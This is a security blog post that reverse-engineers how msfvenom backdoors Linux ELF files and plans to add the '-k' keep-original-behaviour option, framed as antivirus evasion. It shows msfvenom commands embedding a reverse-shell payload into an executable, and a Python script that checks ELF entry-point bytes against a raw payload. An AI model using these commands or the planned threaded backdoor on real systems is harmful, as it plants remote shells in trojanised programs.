Sheep Shellcode

The hackery blog of Vincent Moscatello.

Improving Msfvenom Part 1

This is a progress update on one of my current projects: improving the Metasploit framework. In this part I am only doing reverse engineering/analysis of how msfvenom currently backdoors ELF files. This is all in an effort to add the “-k” functionality to ELF executables (the Linux counterpart of a Windows .exe).

The -k flag tells msfvenom to keep the template's original behaviour and run the injected payload in a new thread. This allows an attacker to preserve the original functionality of an executable while still executing the generated shellcode, which can come in quite handy for evading anti-virus. Unfortunately this feature is only available for 32-bit Windows executables, and msfvenom won’t throw an error when you use this flag on a file format it does not support.

Currently, running the following two commands produces identical executables; the “-k” flag has no effect on the ELF output at all.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 -f elf -x a.out > backdooredNoK

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 -f elf -k -x a.out > backdoored

This can be verified by comparing the MD5 hashes of the two executables (for example with md5sum): they match.

To figure out what msfvenom is actually doing, the executable can be loaded into the IDA disassembler for static analysis. Before the program is backdoored, the program entry point (_start) looks like this:

After being backdoored the program entry point (_start) looks like this:

The original program entry point is simply overwritten with the shellcode. This can be verified by comparing the hex view of the _start function in IDA against the raw shellcode, which msfvenom can emit on its own with the raw output format:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 -f raw  > RAW

The hex dump from IDA looks like:

This is byte-for-byte identical to the raw shellcode:
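The two checks above (hash the two ELF outputs, then compare the bytes at the entry point with the raw payload) can be done from a script instead of by eye in IDA. The following is an added example written for this post; it is not msfvenom's code. It parses the ELF header and program headers by hand for little-endian ELF32/ELF64, translates e_entry back to a file offset through the PT_LOAD segments, and compares what it finds there with a raw payload blob. SAMPLE_RAW is a constructed stand-in for msfvenom's RAW output (an x86 exit stub, not the reverse shell), and build_minimal_elf is a constructed fixture so the script runs offline; with real files, run it as check_entry.py backdoored RAW.

```python
#!/usr/bin/env python3
"""Check what msfvenom put at an ELF's entry point (added example, not msfvenom code)."""
import hashlib
import struct
import sys

PT_LOAD = 1

# Constructed stand-in for msfvenom's raw output: x86 exit(0) stub
# (xor eax,eax / inc eax / int 0x80). Not the reverse-shell payload from the post.
SAMPLE_RAW = b"\x31\xc0\x40\xcd\x80"


def parse_elf(data: bytes) -> dict:
    """Return entry point and (p_type, p_offset, p_vaddr, p_filesz) per program header."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    if ei_data != 1:
        raise ValueError("only little-endian ELF is handled here")
    if ei_class == 1:    # ELF32: e_entry at offset 24, 4-byte fields
        e_entry, e_phoff, _shoff, _flags, _ehsize, e_phentsize, e_phnum = \
            struct.unpack_from("<IIIIHHH", data, 24)
        ph_fmt, idx = "<IIIIIIII", (0, 1, 2, 4)   # p_type p_offset p_vaddr p_paddr p_filesz ...
    elif ei_class == 2:  # ELF64: 8-byte fields, and p_flags moves right after p_type
        e_entry, e_phoff, _shoff, _flags, _ehsize, e_phentsize, e_phnum = \
            struct.unpack_from("<QQQIHHH", data, 24)
        ph_fmt, idx = "<IIQQQQQQ", (0, 2, 3, 5)   # p_type p_flags p_offset p_vaddr p_paddr p_filesz ...
    else:
        raise ValueError("bad EI_CLASS %d" % ei_class)
    segments = []
    for i in range(e_phnum):
        fields = struct.unpack_from(ph_fmt, data, e_phoff + i * e_phentsize)
        segments.append(tuple(fields[j] for j in idx))
    return {"bits": 32 if ei_class == 1 else 64, "entry": e_entry, "segments": segments}


def entry_file_offset(elf: dict) -> int:
    """Translate e_entry (a virtual address) to the file offset that holds its bytes.

    Only file-backed bytes (p_filesz) count: an entry that points past them would be
    zero-filled or unmapped at run time, so it cannot be the injected code.
    """
    for p_type, p_offset, p_vaddr, p_filesz in elf["segments"]:
        if p_type == PT_LOAD and p_vaddr <= elf["entry"] < p_vaddr + p_filesz:
            return elf["entry"] - p_vaddr + p_offset
    raise ValueError("entry point is not backed by any PT_LOAD segment")


def bytes_at_entry(data: bytes, n: int) -> bytes:
    off = entry_file_offset(parse_elf(data))
    return data[off:off + n]


def payload_at_entry(data: bytes, raw: bytes) -> bool:
    """True when the first len(raw) bytes at the entry point equal the raw payload."""
    return bytes_at_entry(data, len(raw)) == raw


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def build_minimal_elf(code: bytes, bits: int = 32) -> bytes:
    """Constructed fixture: a single-PT_LOAD ELF whose entry point is the first byte of code."""
    if bits == 32:
        base, ehsize, phsize = 0x08048000, 52, 32
        ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8
        entry, filesz = base + ehsize + phsize, ehsize + phsize + len(code)
        hdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, entry, ehsize, 0, 0,
                                  ehsize, phsize, 1, 0, 0, 0)
        phdr = struct.pack("<IIIIIIII", PT_LOAD, 0, base, base, filesz, filesz, 5, 0x1000)
    else:
        base, ehsize, phsize = 0x400000, 64, 56
        ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
        entry, filesz = base + ehsize + phsize, ehsize + phsize + len(code)
        hdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, entry, ehsize, 0, 0,
                                  ehsize, phsize, 1, 0, 0, 0)
        phdr = struct.pack("<IIQQQQQQ", PT_LOAD, 5, 0, base, base, filesz, filesz, 0x1000)
    return hdr + phdr + code


if __name__ == "__main__":
    if len(sys.argv) == 3:   # usage: check_entry.py <backdoored-elf> <raw-payload>
        elf_bytes = open(sys.argv[1], "rb").read()
        raw = open(sys.argv[2], "rb").read()
    else:                    # no files given: run against the constructed fixture
        elf_bytes, raw = build_minimal_elf(SAMPLE_RAW), SAMPLE_RAW
    info = parse_elf(elf_bytes)
    off = entry_file_offset(info)
    print("ELF%d entry 0x%x -> file offset 0x%x" % (info["bits"], info["entry"], off))
    print("bytes at entry:", bytes_at_entry(elf_bytes, len(raw)).hex())
    print("payload sits at entry:", payload_at_entry(elf_bytes, raw))
    print("md5:", md5_hex(elf_bytes))
```

Running it twice, once per msfvenom output, and comparing the md5 lines reproduces the identical-hash observation; a True from payload_at_entry is the scripted version of the IDA hex-view comparison. The offset translation goes through the program headers rather than section headers on purpose: a stripped or deliberately mangled binary may have no section table, but the loader only needs PT_LOAD entries.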

In order to make this project more manageable I’ve broken it up into five chunks, each of which acts as its own milestone for tackling the problem.

  1. Reverse engineer Windows/Linux executables to determine how msfvenom is currently handling the “-k” option (where the machine code is stored, how it is triggered, whether it loads libraries, etc.).
  2. Using the gathered information, manually construct shellcode that starts in a new thread inside a Linux executable.
  3. Write a script that automates the threading process from the previous milestone.
  4. Write a script that embeds the new thread-starting shellcode into the ELF executable.
  5. Interface this script with msfvenom’s “-k” option.